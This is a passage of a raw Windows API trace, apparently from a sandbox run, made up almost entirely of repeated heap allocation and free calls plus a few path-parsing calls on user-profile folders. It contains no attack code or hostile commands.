(HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0194.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0194.498] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Local Settings\\") returned="Local Settings\\" [0194.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0194.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0194.498] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0194.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0194.499] HeapFree (in: hHeap=0x620000, 